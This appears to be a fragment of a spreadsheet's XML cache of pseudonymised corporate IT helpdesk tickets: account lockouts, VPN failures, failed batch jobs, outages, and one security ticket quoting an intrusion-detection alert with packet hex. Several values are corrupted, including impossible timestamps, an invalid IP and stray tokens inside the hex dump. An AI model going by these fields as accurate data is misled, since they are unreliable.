    <s v="probleme mit accespoint \konferenzraum f&amp;e \niptbwdq csenjruz"/>
    <s v="probleme mit accespoint \konferenzraum f&amp;e \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit Ã¶ffnen m:\wsb_exe \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="probleme mit Ã¶ffnen m:\wsb_exe \we_wu102 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="qrstgxwn fhpyxgjz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="datenlogger opus20 thip q475024 kann keine verbindung herstellen"/>
    <s v="datenlogger opus20 thip q475024, wird zur Ã¼berwachung der raumtemperatur benÃ¶tigt, findet nach der externen wartung keine netzwerkverbindung zum pc der pmÃ¼"/>
    <s v="qkedpfyj qechgaty"/>
    <x v="32"/>
  </r>
  <r>
    <s v="remote vpn issue"/>
    <s v="i cannot connect to remote vpn using either of the links below (_x000d__x000a_probably it has something to do with emea upgrade activity that took place on september 9._x000d__x000a_please fix the problem so that i can connect to vpn."/>
    <s v="dpurliet ujlmdfac"/>
    <x v="0"/>
  </r>
  <r>
    <s v="requirement of internet access for machine pc - eorjylzm vrkofesj at pu6"/>
    <s v="_x000a__x000a_received from: dfiyvmec.wxioadpt@gmail.com_x000a__x000a_machine details :   ip address 172.16.0.100_x000a_subnet mask      :  _x000a_physical address: 00-07-3256-14-2e-a8_x000a_host name :  mc350_x000a__x000a_service engg from the machine supplier from switzerland is with us for a training programdntyme._x000a_we need the  internet access in the machine  for a week_x000a__x000a_request your immediate support_x000a__x000a_kuhgtyjvelu. u_x000a_manager â€“ reliability engineering_x000a_dfiyvmec.wxioadpt@gmail.com&lt;mailto:dfiyvmec.wxioadpt@gmail.com&gt;_x000a__x000a_"/>
    <s v="dfiyvmec wxioadpt"/>
    <x v="18"/>
  </r>
  <r>
    <s v="can not create inventory list"/>
    <s v="forwarded request to the rqfhiong zkwfqagb dl, copying tomoe._x000d__x000a__x000d__x000a_email:_x000d__x000a_from: zsqabokr xbtsaodr _x000d__x000a_sent: monday, september 12, 2016 3:30 pm_x000d__x000a_to: 'nwfodmhc exurcwkm'_x000d__x000a_subject: can not create inventory list_x000d__x000a__x000d__x000a_help desk,_x000d__x000a__x000d__x000a_about the quantity of mm no.6370759, we want to change from zero._x000d__x000a__x000d__x000a_please find the attached document._x000d__x000a_we have problems._x000d__x000a_â‘  the inventory list cannot show by mb52._x000d__x000a_â‘¡ the inventory list cannot create by mi31._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="zsqabokr xbtsaodr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="è½¬å‘: ä»¥è‰²åˆ—ä¿®ç£¨/rma6001502596"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear teamï¼Œ_x000a_we need to cancel sto#5019103390,pls. help to reverse its inwarehouse_tool markhtyed in red,thx!_x000a_[cid:image001.png@01d20d06.437cc160]_x000a__x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="9"/>
  </r>
  <r>
    <s v="account for aqzcisjy raflghneib, vvdghtteij, is locked. please unlock."/>
    <s v="account for aqzcisjy raflghneib, vvdghtteij, is locked. please unlock."/>
    <s v="sxabotdw xlozwcyk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password expires in 4 days"/>
    <s v="dear all, my password runs out in 4 days, i am travelling and have no chance to come into the company network,please extend my current password until the 21st of september "/>
    <s v="jxphgfmb gjbtuwek"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to set skype meeting in outlook "/>
    <s v="unable to set skype meeting in outlook "/>
    <s v="hzagqxbf fckwrsdq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1332 failed in job_scheduler at: 09/12/2016 02:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1332 failed in job_scheduler at: 09/12/2016 02:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_1338 failed in job_scheduler at: 09/12/2016 02:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1338 failed in job_scheduler at: 09/12/2016 02:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="there isn't any price under customer pruchase order 24899738"/>
    <s v="the customer group 3 of customer 81504358 has been defigned as cn7, and i was told price of the 4 products ( mm#  2869194, 2936676, 4232294, 5174961) have been maitained in system, but the order 35900849 isn't with any price on it. please check and let me know what's wrong in system for it. the customer is in urgnet need of the order , please solve the problem for us aerp._x000d__x000a_please find the detail from the attached._x000d__x000a_"/>
    <s v="phfduvwl yqnaucep"/>
    <x v="12"/>
  </r>
  <r>
    <s v="security incidents - (  #in33847938) : possible malware infection - traffic from sinkhole domain to apul7701066"/>
    <s v="source ip :195.22.28.222_x000d__x000a_source port: 80_x000d__x000a_source ip geolocation: lisbon, prt_x000d__x000a_destination ip: 10.44.22.248_x000d__x000a_destination hostname: apul8812177 _x000d__x000a_destination port: 58300_x000d__x000a_user  name:xcirqlup zopbiufn_x000d__x000a_location :/asiapac/apac/apacpuchn/computers/apul8812177_x000d__x000a_sep , sms status :not updated_x000d__x000a_field sales user ( yes / no) :  no_x000d__x000a_dsw event log:see below_x000d__x000a_-----------------------------------------------------------------------------------------------------------_x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a_related events: _x000d__x000a_event id: 93002683_x000d__x000a_event summary: 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset_x000d__x000a_occurrence count: 2_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 195.22.28.222_x000d__x000a_source port: 80_x000d__x000a_source ip geolocation: lisbon, prt_x000d__x000a_destination ip: 10.44.22.248_x000d__x000a_destination hostname: apul8812177 _x000d__x000a_destination port: 58300_x000d__x000a_connection directionality: incoming_x000d__x000a_protocol: tcp_x000d__x000a_http status code: 302_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 80.68.49.4169_x000d__x000a_device name: isensor05.company.com_x000d__x000a_log time: 2016-09-12 at 04:37:39 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 703_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 2_x000d__x000a_vendor version: 7_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 699417_x000d__x000a_inspector event id: 888388110_x000d__x000a_ontology id: 200020003203755736_x000d__x000a_event type id: 200020003203582148_x000d__x000a_agent id: 102835_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21163262:2] 52151 vid36000 server response with anubis sinkhole cookie set - probable infected asset [**]_x000d__x000a_[classification: none] [priority: 2] [action: accept] [impact_flag: 0] [impact: 0] [blocked: 0] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 606873][event id: 703][time: 2584766160.739356]_x000d__x000a_[src ip: 195.22.28.222][dst ip: 10.44.22.248][sport/itype: 80][dport/icode: 58300][proto: 6]_x000d__x000a_09/12/2016-04:37:39.739356 195.22.28.222:80 -&gt; 10.44.22.248:58300_x000d__x000a_tcp ttl:43 tos:0x0 id:22582 iplen:20 dgmlen:391 df_x000d__x000a_***ap*** seq: 0x501aa6d0 ack: 0x74888c9e win: 0x68b0 tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /domain/newflv.sohu.ccgslb.net]_x000d__x000a__x000d__x000a_[ex http_hostname 10: sso.anbtr.com]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_.....1.w.h..........e...x6@.+..&quot;.....,...p..p...t...p.h..$..http/1.1.302.moved.temporarily..server:.nginx..date:.mon,.12.sep.2016.04:37:39.gmt..content-type:.text/html..connection:.close..set-cookie:.anbtr=0a51a90cb840cc144b448e76579f6b84;.domain=.ccgslb.net..location:._x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000 0c00 0000 1331 d657 1c48 0b00 8701 0000 .....1.w.h......_x000d__x000a_000010 8701 0000 4500 0187 5836 4000 2b06 f522 ....e...x6@.+..&quot;_x000d__x000a_000020 c316 1cde 0a2c 16f8 0050 e3bc 501a a6d0 .....,...p..p..._x000d__x000a_000030 7488 8c9e 5018 68b0 0a24 0000 4854 5450 t...p.h..$..http_x000d__x000a_000040 2f31 2e31 2033 3032 204d 6f76 6564 2054 /1.1.302.moved.t_x000d__x000a_000050 656d 706f 7261 7269 6c79 0d0a 5365 7276 emporarily..serv_x000d__x000a_000060 6572 3a20 6e67 696e 780d 0a44 6174 653a er:.nginx..date:_x000d__x000a_000070 204d 6f6e 2c20 3132 2053 6570 2032 3031 .mon,.12.sep.201_x000d__x000a_000080 3620 3034 3a33 373a 3339 2047 4d54 0d0a 6.04:37:39.gmt.._x000d__x000a_000090 436f 6e74 656e 742d 5479 7065 3a20 7465 content-type:.te_x000d__x000a_0000a0 7874 2f68 746d 6c0d 0a43 6f6e 6e65 6374 xt/html..connect_x000d__x000a_0000b0 696f 6e3a 2063 6c6f 7365 0d0a 5365 742d ion:.close..set-_x000d__x000a_0000c0 436f 6f6b 6965 3a20 616e 6274 723d 3061 cookie:.anbtr=0a_x000d__x000a_0000d0 3531 6139 3063 6238 3430 6363 3134 3462 51a90cb840cc144b_x000d__x000a_0000e0 3434 3865 3736 3537 3966 3662 3834 3b20 448e76579f6b84;._x000d__x000a_0000f0 646f 6SID_26 696e 3d2e 6363 6773 6c62 2e6e domain=.ccgslb.n_x000d__x000a_000100 6574 0d0a 4c6f 6361 7469 6f6e 3a20 6874 et..location:.ht_x000d__x000a_000110 7470 3a2f 2f78 7373 6f2e 6e65 7766 6c76 tp://xsso.newflv_x000d__x000a_000120 2e73 6f68 752e 6363 6773 6c62 2e6e 6574 .sohu.ccgslb.net_x000d__x000a_000130 2f30 6135 3161 3930 6362 3834 3063 6331 /0a51a90cb840cc1_x000d__x000a_000140 3434 6234 3438 6537 3635 3739 6636 6238 44b448e76579f6b8_x000d__x000a_000150 340d 0a0d 0a47 6f20 6874 7470 3a2f 2f78 4....go._x000d__x000a_000160 7373 6f2e 6e65 7766 6c76 2e73 6f68 752e sso.newflv.sohu._x000d__x000a_000170 6363 6773 6c62 2e6e 6574 2f30 6135 3161 ccgslb.net/0a51a_x000d__x000a_000180 3930 6362 3834 3063 6331 3434 6234 3438 90cb840cc144b448_x000d__x000a_000190 6537 3635 3739 6636 6238 34 e76579f6b84_x000d__x000a_==pcap 1 hex e=="/>
    <s v="gzhapcld fdigznbk"/>
    <x v="31"/>
  </r>
  <r>
    <s v="apac apac - china company-ap-chn-china-3750g-access-vmsw01 and multiple servers went down at 1:55 am et on 09/12"/>
    <s v="job name:"/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to open .jpg , .png files"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pxbqkfgm.qexvrmcn@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am unable to open .jpg &amp; .png files. pls. do the needful._x000d__x000a__x000d__x000a_vivthyek byuihand_x000d__x000a_asst manager- sales_x000d__x000a_company india ltd, india._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="pxbqkfgm qexvrmcn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="how to recall send message in outlook"/>
    <s v="how to recall send message in outlook"/>
    <s v="iwqhcmok ovxygicj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for mobaidfx gviwlsrm on erp / produktion / hcm"/>
    <s v="passwort zurÃ¼cksetzen - "/>
    <s v="mobaidfx gviwlsrm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="handscanner am rÃ¼ckmeldeterminal 6 defekt"/>
    <s v="handscanner am rÃ¼ckmeldeterminal 6 defekt (gegenÃ¼ber kln)"/>
    <s v="mhvbnqri sacvgzxf"/>
    <x v="32"/>
  </r>
  <r>
    <s v="netweaver "/>
    <s v="folgender fehler: microsoft .net framdntyework 4,5 is not installed._x000d__x000a_please contact your administrator. "/>
    <s v="ogfjbrlw nwakldmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company engineering_tool access"/>
    <s v="_x000a__x000a_received from: mcphgvnb.bdegqtyj@gmail.com_x000a__x000a_hello,_x000a_        please help me to access the company engineering_tool, tool data system and crm.   company engineering_tool is asking email and password to open and tried it with my email (mcphgvnb.bdegqtyj@gmail.com&lt;mailto:mcphgvnb.bdegqtyj@gmail.com&gt;) &amp; password but it is showing incorrect id &amp; password so please do needful_x000a__x000a_thanking you_x000a_       ramdntygy_x000a__x000a__x000a_"/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to engineering tool "/>
    <s v="unable to connect to engineering tool "/>
    <s v="qrstgxwn fhpyxgjz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can not log into vpn"/>
    <s v="_x000a_name:gwptzvxm rhozsfty_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:gwptzvxm.rhozsfty@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:can not log into vpn"/>
    <s v="gwptzvxm rhozsfty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sorahdyggs (ijyuvind sohytganvi ) his system is locked and he is not able to log in"/>
    <s v="_x000d__x000a_name:pradtheyp_x000d__x000a_language:_x000d__x000a_browser:microsoft internet explorer_x000d__x000a_email:pradtheyp.jeyabalan@gmail.com_x000d__x000a_customer number:_x000d__x000a_telephone:0649737471_x000d__x000a_summary:sorahdyggs (ijyuvind sohytganvi ) his system is locked and he is not able to log in"/>
    <s v="pvuyszkd mqxdtubl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="t/o can not be generated"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_the t/o can not be generated for below dn, would you pls help to check , "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_1141 failed in job_scheduler at: 09/11/2016 23:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1141 failed in job_scheduler at: 09/11/2016 23:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="xckbimhl ymejrugf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="retrieving data from old to new laptop"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jkpwisnf.lgpdyncm@gmail.com_x000d__x000a__x000d__x000a_hello_x000d__x000a_i forgot the password of old laptop and i have to submit the same to india office._x000d__x000a_before doing that, i want to transfer some data especially engineering_tools._x000d__x000a_could you please help me in resolving the issue._x000d__x000a__x000d__x000a_"/>
    <s v="jkpwisnf lgpdyncm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="chobktqj qdamxfuc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 09/11/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 09/11/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 09/11/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 09/11/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 09/11/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 09/11/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="battery at warning status"/>
    <s v="battery showing warning status "/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="18"/>
  </r>
  <r>
    <s v="unable to login to erp SID_34 "/>
    <s v="unable to login to erp SID_34 "/>
    <s v="vwdghyai pjehycoz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn"/>
    <s v="unable to connect to vpn vpn "/>
    <s v="aqdjcuhn lagfitkz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock erp logon"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jofvunqs.uwigjmzv@gmail.com_x000d__x000a__x000d__x000a_hello:_x000d__x000a_please help me unlock erp logon.  i can not logon the erp system ,input my password._x000d__x000a__x000d__x000a_best "/>
    <s v="jofvunqs uwigjmzv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="security_tool password manager service down in component server lhqsm657"/>
    <s v="lhqsm657: security_tool application is down. _x000d__x000a_component name security_tool password manager is down"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="19"/>
  </r>
  <r>
    <s v="HostName_986:(plm conversion-  production) alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, ex"/>
    <s v="HostName_986:(plm conversion-  production):  alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_53 : 85% space consumed. space available: 0.98 m "/>
    <s v="HostName_53: volume: f:\ label:dat2-HostName_53 d4e35b72 on server: HostName_53 is over _x000d__x000a_85% space consumed. space available: 0.98 m "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="lhbsm005 : 85% disk space consumed. space available: 4.5 g "/>
    <s v="lhbsm005: volume: f:\ label:dat2-lhbsm005 7446ecc9 on server: lhbsm005 is over _x000d__x000a_85% space consumed. space available: 4.5 g "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job snp_heu_6_regen failed in job_scheduler at: 09/11/2016 17:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_6_regen failed in job_scheduler at: 09/11/2016 17:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job snp_heu_5_regen failed in job_scheduler at: 09/11/2016 17:33:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_5_regen failed in job_scheduler at: 09/11/2016 17:33:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 09/11/2016 14:46:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 09/11/2016 14:46:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_1427 failed in job_scheduler at: 09/11/2016 14:44:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1427 failed in job_scheduler at: 09/11/2016 14:44:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job SID_37hoti failed in job_scheduler at: 09/11/2016 14:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_37hoti failed in job_scheduler at: 09/11/2016 14:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bk_hana_SID_62_os_wly_dp failed in job_scheduler at: 09/11/2016 13:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_62_os_wly_dp failed in job_scheduler at: 09/11/2016 13:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job bk_hana_SID_22_os_wly failed in job_scheduler at: 09/11/2016 11:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bk_hana_SID_22_os_wly failed in job_scheduler at: 09/11/2016 11:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="vip 1 - how can i change my password remotely? i'm traveling and it expires in 2 days."/>
    <s v="_x000d__x000a__x000d__x000a_received from: yxvqdtmk.kbicqjrp@gmail.com_x000d__x000a__x000d__x000a_sent from mail&lt;_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="yxvqdtmk kbicqjrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to access to t or p drives"/>
    <s v="name:cighytol yjurztgd_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:cighytol.yjurztgd@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:hello, closing down my laptop and starting vpn again has not solved the issue.  i do not have access to t or p drives today.  teams and global.  i can't do any work until this access is restored.  please help."/>
    <s v="cighytol yjurztgd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to outlook "/>
    <s v="unable to connect to outlook "/>
    <s v="kailyenh zfyvkopr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms office 2016 installation"/>
    <s v="ms office 2016 installation_x000a__x000a_contact no:- "/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power supplied failed on library 2. "/>
    <s v="from: timnhyt rehtyulds _x000a_sent: sunday, september 11, 2016 7:14 am_x000a_to: datacenter_x000a_cc: -dacl3_x000a_subject: re: qa* cold backups_x000a__x000a__x000a_"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_1010 : the service is down after the weekend reboot (erpstartsrv.exe) "/>
    <s v="HostName_1010 : the service is down after the weekend reboot (erpstartsrv.exe) "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_579 failed in job_scheduler at: 09/11/2016 07:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_579 failed in job_scheduler at: 09/11/2016 07:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job co_val_update_crosscomp failed in job_scheduler at: 09/11/2016 06:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job co_val_update_crosscomp failed in job_scheduler at: 09/11/2016 06:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job snp_heu_1_regen failed in job_scheduler at: 09/11/2016 05:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_1_regen failed in job_scheduler at: 09/11/2016 05:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job snp_heu_2_regen failed in job_scheduler at: 09/11/2016 05:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_2_regen failed in job_scheduler at: 09/11/2016 05:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="network outage:   malaysia site hard down since 12:41 am et on 09/11."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________12:41 am et on 09/11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_yes__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___no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HostName_894 : c:\ label:sys-HostName_894 28385a7b on server: HostName_894 is over  85% space consumed. space available: 4.4 g"/>
    <s v="HostName_894 : c:\ label:sys-HostName_894 28385a7b on server: HostName_894 is over  85% space consumed. space available: 4.4 g"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="38"/>
  </r>
  <r>
    <s v="restoring ppt"/>
    <s v="restoring ppt"/>
    <s v="navfgybz fuavxjzk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp login-password issue."/>
    <s v="_x000d__x000a__x000d__x000a_received from: ojgfmvep.zbatowgi@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_facing erp login problem. password issue._x000d__x000a__x000d__x000a_with best "/>
    <s v="ojgfmvep zbatowgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 09/11/2016 01:27:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 09/11/2016 01:27:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/11/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 09/11/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="engineering_tool installation, ms office 2016 installation, vpn access, erp access."/>
    <s v="engineering_tool installation, ms office 2016 installation, vpn access, erp access."/>
    <s v="mcphgvnb bdegqtyj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_39cold failed in job_scheduler at: 09/78.93.52.6799:58:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39cold failed in job_scheduler at: 09/78.93.52.6799:58:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_36cold failed in job_scheduler at: 09/78.93.52.6798:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_36cold failed in job_scheduler at: 09/78.93.52.6798:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job SID_7cold failed in job_scheduler at: 09/78.93.52.6798:14:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_7cold failed in job_scheduler at: 09/78.93.52.6798:14:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job Job_749 failed in job_scheduler at: 09/78.93.52.6795:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_749 failed in job_scheduler at: 09/78.93.52.6795:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="vpn issue"/>
    <s v="hi liuytre,_x000d__x000a__x000d__x000a_sorry to hear of the issues with ethics and vpn that you're experiencing._x000d__x000a__x000d__x000a_you do have access to vpn now and should be able to connect through _x000d__x000a__x000d__x000a_also, please could you share the error you have when trying to get into ethics. i understand there was a change in your employment status which might be contributing to it but will need to confirm. please share when the changes took place and the error message._x000d__x000a__x000d__x000a_"/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics issue"/>
    <s v="hi liuytre,_x000d__x000a__x000d__x000a_sorry to hear of the issues with ethics and vpn that you're experiencing._x000d__x000a__x000d__x000a_you do have access to vpn now and should be able to connect through _x000d__x000a__x000d__x000a_also, please could you share the error you have when trying to get into ethics. i understand there was a change in your employment status which might be contributing to it but will need to confirm. please share when the changes took place and the error message._x000d__x000a__x000d__x000a_"/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="myaornqv fkjmpxbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to vpn "/>
    <s v="unable to connect to vpn "/>
    <s v="sydgvpao aocjqrmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage:jundiai - (company):company-sifco-jundiai-rtr circuit is down since at 7:27 am et on 09/10.no backup"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____na_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____7:27 am et on 09/10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the dynamics crm url checks is reporting a : down status on, company-crm-sp-mfg_tooltion.azurewebsites.net."/>
    <s v="observing below alert in monitoring_tool since 06:33 am et on 09/10._x000d__x000a__x000d__x000a_application &quot;dynamics crm url checks&quot; on node &quot;company-crm-sp-mfg_tooltion.azurewebsites.net&quot; is down "/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="39"/>
  </r>
  <r>
    <s v="ap vpn is not getting connected"/>
    <s v="_x000a__x000a_received from: dargthy.sohfyuimaiah@company.com_x000a__x000a_ap vpn is not getting connected. please assist at an earliest. "/>
    <s v="sholvcmf bjtpomrl"/>
    <x v="0"/>
  </r>
  <r>
